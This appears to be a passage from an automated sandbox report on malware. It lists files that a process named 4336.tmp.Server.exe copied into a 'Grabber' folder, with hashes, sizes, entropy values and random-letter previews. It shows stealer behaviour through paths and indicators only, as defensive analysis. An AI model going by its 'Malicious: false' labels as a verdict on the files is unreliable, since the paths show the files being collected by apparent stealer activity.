Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Reputation:	unknown
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	402
Entropy (8bit):	3.493087299556618
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
MD5:	ECF88F261853FE08D58E2E903220DA14
SHA1:	F72807A9E081906654AE196605E681D5938A2E6C
SHA-256:	CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
SHA-512:	82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
Malicious:	false
Reputation:	unknown
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\HTAGVDFUIE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KATAXZVCPS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Reputation:	unknown
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KZWFNRXYKI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Reputation:	unknown
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Reputation:	unknown
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\NIKHQAIQAU.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:	24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Reputation:	unknown
Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Reputation:	unknown
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFI